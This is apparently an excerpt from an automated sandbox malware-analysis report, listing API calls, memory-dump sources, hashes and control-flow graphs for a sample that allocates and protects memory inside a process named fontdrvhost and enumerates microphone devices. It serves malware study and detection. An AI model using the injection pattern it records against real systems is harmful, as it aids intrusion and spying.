                                                                                                                                                          • Part of subcall function 004E4850: waveInGetNumDevs.WINMM(defaultmicrophone,00000000,?,00000000,?,?,?,?,004E8459,?,?,?,?,?,?,?), ref: 004E489B
                                                                                                                                                          • Part of subcall function 004E4C80: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C7E,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E4C8A
                                                                                                                                                          • Part of subcall function 004E4C80: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E4CD7
                                                                                                                                                          • Part of subcall function 004E3860: EnterCriticalSection.KERNEL32(?,00000000,?,004E5C91,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E3868
                                                                                                                                                          • Part of subcall function 004E3860: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E388F
                                                                                                                                                          • Part of subcall function 004E5B40: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C9B,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?), ref: 004E5B4C
                                                                                                                                                          • Part of subcall function 004E5B40: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5B71
                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000004,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E5CA2
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5CB2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$Devswave
                                                                                                                                                        • String ID: echosuppression$gain
                                                                                                                                                        • API String ID: 967401230-1829011300
                                                                                                                                                        • Opcode ID: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                        • Instruction ID: eec625d20ecc8ac728587d7ca18c0fda910ff7f544bd80cb39fcd025b5d808b6
                                                                                                                                                        • Opcode Fuzzy Hash: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                        • Instruction Fuzzy Hash: 4C118E35700B449BC711EB67C9A1A2BB3B9BF8871AB15049EE5464B741CB24FC02CBA4
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0050B060: CreateEventA.KERNEL32(00000000,?,00000000,00000000,00000000,00509F02,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E), ref: 0050B06E
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000007C,00000001,00000001,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E,00549D98,?,?), ref: 00509F34
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000094,?,?,?,?,?,?,?,?,00153804), ref: 00509F3D
                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 00509F6E
                                                                                                                                                        • SetEvent.KERNEL32 ref: 00509F74
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalInitializeSection$Event$Create
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 662013055-0
                                                                                                                                                        • Opcode ID: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                        • Instruction ID: a00b6d7b902e657a52a59b9571d5736a80dfe09fbfe7896e9036a1fe9281f1e6
                                                                                                                                                        • Opcode Fuzzy Hash: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                        • Instruction Fuzzy Hash: 9B21C4B1540B049FE320DF6AD884A9BFBE8FF94704F00490EE1AA83661D7B1B405CB61
                                                                                                                                                        APIs
                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0079DEAD
                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0079DEC6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Value___vcrt_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1426506684-0
                                                                                                                                                        • Opcode ID: a5c6c870cbe02360b2234619489db598323c740032db365f4575ed4472c763a2
                                                                                                                                                        • Instruction ID: 00b83a8abc7ce385ab32bf354e41978ee56b478a752cb83b12f0cae4687b3bd0
                                                                                                                                                        • Opcode Fuzzy Hash: a5c6c870cbe02360b2234619489db598323c740032db365f4575ed4472c763a2
                                                                                                                                                        • Instruction Fuzzy Hash: 1801FC32149351AEAE3537747CCA96A27A9EB56774B200329F525491E1EF2D5C016344
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 004D2AB9
                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004D2B3D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CompatibleCreateDirectorySystem
                                                                                                                                                        • String ID: Macromed\Flash\
                                                                                                                                                        • API String ID: 2606042488-1438515271
                                                                                                                                                        • Opcode ID: f3a03fc43bac1eceec5fa71542f71d31eecc73db7bcc940814b63f05b2770dec
                                                                                                                                                        • Instruction ID: 299e9cb63676f09c6c690dce7675c16131e739682a5e940449f79e26451de6f9
                                                                                                                                                        • Opcode Fuzzy Hash: f3a03fc43bac1eceec5fa71542f71d31eecc73db7bcc940814b63f05b2770dec
                                                                                                                                                        • Instruction Fuzzy Hash: 8F118A711047016FC704EF21EC52AAF77E4BF98704F40491EF19943281DB78A908CFAA
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B22,00000001,000000FF), ref: 004F2BFE
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2C88
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2CCE
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2CF1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                        • Opcode ID: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                        • Instruction ID: d821757bbb06b5f881817bb4be3b83133dcd2ebdcf47b2e92145d0cebd45ebc1
                                                                                                                                                        • Opcode Fuzzy Hash: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                        • Instruction Fuzzy Hash: D631D2762042854FD3248F29D898A3BBBF5EFD9351F19856EE696C7381C779D808C720
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004F7247,?), ref: 004F64C1
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F64E6
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F64EC
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F6515
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                        • Instruction ID: c39e4b2d7a975ea5970b06f88a1f0ae82272a8bb6f48ad921d14b69448efe04b
                                                                                                                                                        • Opcode Fuzzy Hash: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                        • Instruction Fuzzy Hash: FC0188352003485BC714EF24D880A77F3A9AF46258B19559DE5C657342CA39EC06CBA4
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0040139D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004013B3
                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000005), ref: 004013CA
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000005), ref: 004013D8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                        • Instruction ID: 1dc668918495c93d19b35d2f921703afc781594381be1afc9f76799b5a6aac2f
                                                                                                                                                        • Opcode Fuzzy Hash: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                        • Instruction Fuzzy Hash: 280112B620070AAFC310CF69D884946FBF8FFA8314B10C55AE95983711C771F956CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 03220326
                                                                                                                                                          • Part of subcall function 032200A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032200CD
                                                                                                                                                          • Part of subcall function 032200A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220279
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 03220378
                                                                                                                                                        • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 032203E7
                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220407
                                                                                                                                                        • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0322042E
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 03220456
                                                                                                                                                        • CloseHandle.KERNELBASE(?), ref: 03220471
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000003.2123745780.0000000003220000.00000040.00000001.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_27_3_3220000_fontdrvhost.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                        • String ID: ,
                                                                                                                                                        • API String ID: 3867569247-3772416878
                                                                                                                                                        • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                        • Instruction ID: 4c7304c3de5ea7f029943b831f7d4203956b98391d89c7326213943c1045ec46
                                                                                                                                                        • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                        • Instruction Fuzzy Hash: 98610AB5910219FFDB20DFA5CC84ADEBBB9FF08350F14C51AE959A7240D774A980CB60
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032200CD
                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220279
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000003.2123745780.0000000003220000.00000040.00000001.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_27_3_3220000_fontdrvhost.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2087232378-0
                                                                                                                                                        • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                        • Instruction ID: 9d9349a8923e0f6f491ff43766b1a6f201cbf5cb86d7753df3ddcc2bb20695a6
                                                                                                                                                        • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                        • Instruction Fuzzy Hash: 96718D71E1425AEFDB41CF98C981BEDBBF0AF09314F288095E465FB241C274AA91CF65

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:33.4%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:83.3%
                                                                                                                                                        Total number of Nodes:24
                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                        execution_graph 415 289ebe81cf4 417 289ebe81d19 415->417 416 289ebe81fa1 417->416 426 289ebe815c0 417->426 419 289ebe81f98 CloseHandle 419->416 420 289ebe81f88 NtAcceptConnectPort 420->419 421 289ebe81e3a 421->419 421->420 422 289ebe81ecd 421->422 429 289ebe80ac8 421->429 435 289ebe81aa4 NtAcceptConnectPort 422->435 428 289ebe815f4 NtAcceptConnectPort 426->428 428->421 430 289ebe80c62 429->430 431 289ebe80ae8 429->431 430->422 431->430 432 289ebe80be8 NtAcceptConnectPort 431->432 432->430 433 289ebe80c1b 432->433 433->430 434 289ebe80c33 NtAcceptConnectPort 433->434 434->430 436 289ebe81af7 435->436 438 289ebe81c04 435->438 441 289ebe81870 436->441 438->420 439 289ebe81b10 440 289ebe81bb6 NtAcceptConnectPort 439->440 440->438 443 289ebe81889 441->443 442 289ebe81949 442->439 443->442 444 289ebe81930 GetProcessMitigationPolicy 443->444 444->442

                                                                                                                                                        Callgraph

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001F.00000002.2515294505.00000289EBE80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000289EBE80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_31_2_289ebe80000_fontdrvhost.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3811980168-0
                                                                                                                                                        • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                        • Instruction ID: d36d0b2678df95ab2d71508a8768511f4534d94d2b98940d07ea060d75ce7c5f
                                                                                                                                                        • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                        • Instruction Fuzzy Hash: C891E634508E489FDB65EF18D4857F577E1FB88310F18866FE48BD7296EA34A88287C1

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001F.00000002.2515294505.00000289EBE80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000289EBE80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_31_2_289ebe80000_fontdrvhost.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                                        • Opcode ID: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                        • Instruction ID: 55cb743cf079c39e9486cd4b869827e62e689408ad3edb0873225b533f62435c
                                                                                                                                                        • Opcode Fuzzy Hash: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                        • Instruction Fuzzy Hash: E9510439519E560AE32CE6389899678BBD5FB81305F3C455FD0F3C51A3ED28C58687C2

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001F.00000002.2515294505.00000289EBE80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000289EBE80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_31_2_289ebe80000_fontdrvhost.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AcceptConnectPort$MitigationPolicyProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2923266908-0
                                                                                                                                                        • Opcode ID: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                        • Instruction ID: 615c4fb931b73bb375013e5a3c471d5a63878f355ad941e3a36b1f22bf2a1a21
                                                                                                                                                        • Opcode Fuzzy Hash: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                        • Instruction Fuzzy Hash: C141C630208F488FDB54DF2C98897A57BD1EB59320F0883AEE85ACB2D7DA34D54587D6

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 118 289ebe815c0-289ebe815f2 119 289ebe815f4-289ebe815f7 118->119 120 289ebe815f9-289ebe815fb 118->120 121 289ebe8161f-289ebe8166d NtAcceptConnectPort 119->121 122 289ebe8160b-289ebe8160d 120->122 123 289ebe815fd-289ebe81609 120->123 124 289ebe8161d 122->124 125 289ebe8160f-289ebe8161b 122->125 123->121 124->121 125->121
                                                                                                                                                        APIs
                                                                                                                                                        • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,00000289EBE81E3A), ref: 00000289EBE81654
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001F.00000002.2515294505.00000289EBE80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000289EBE80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_31_2_289ebe80000_fontdrvhost.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                                        • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                        • Instruction ID: 1c81b52d0cd6e4d3ef1aa1446c1c345a9ef0157d464e8ab5cd440c965f0c90bd
                                                                                                                                                        • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                        • Instruction Fuzzy Hash: 77215471508B448FDB54DF18C4C9665B7E1FB68305F184A7FE48AD7250DB31D485CB42

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 95 289ebe81870-289ebe818a0 call 289ebe808a4 * 2 100 289ebe81954-289ebe8195b 95->100 101 289ebe818a6-289ebe818a9 95->101 101->100 102 289ebe818af-289ebe818b9 101->102 102->100 103 289ebe818bf-289ebe818c4 102->103 103->100 104 289ebe818ca-289ebe818d7 103->104 104->100 105 289ebe818d9-289ebe818e1 104->105 105->100 106 289ebe818e3-289ebe818ee 105->106 106->100 107 289ebe818f0-289ebe818f7 106->107 107->100 108 289ebe818f9-289ebe818fc 107->108 108->100 109 289ebe818fe-289ebe81906 108->109 109->100 110 289ebe81908-289ebe8190b 109->110 110->100 111 289ebe8190d-289ebe81916 110->111 111->100 112 289ebe81918-289ebe8191c 111->112 112->100 113 289ebe8191e-289ebe8192e 112->113 113->100 115 289ebe81930-289ebe81947 GetProcessMitigationPolicy 113->115 115->100 116 289ebe81949-289ebe8194e 115->116 116->100 117 289ebe81950-289ebe81951 116->117 117->100
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001F.00000002.2515294505.00000289EBE80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000289EBE80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_31_2_289ebe80000_fontdrvhost.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                        • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                        • Instruction ID: 2b3c9021ff8b6da658cee7324c166e875de705b5971f5089cd7b6d7f9e5b7329
                                                                                                                                                        • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                        • Instruction Fuzzy Hash: A8318F35101E475AEBA5D6A8A8987F176D0FB98310F1C81BFC015E71D1EE69C9C9C7C2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001F.00000002.2515294505.00000289EBE80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000289EBE80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_31_2_289ebe80000_fontdrvhost.jbxd
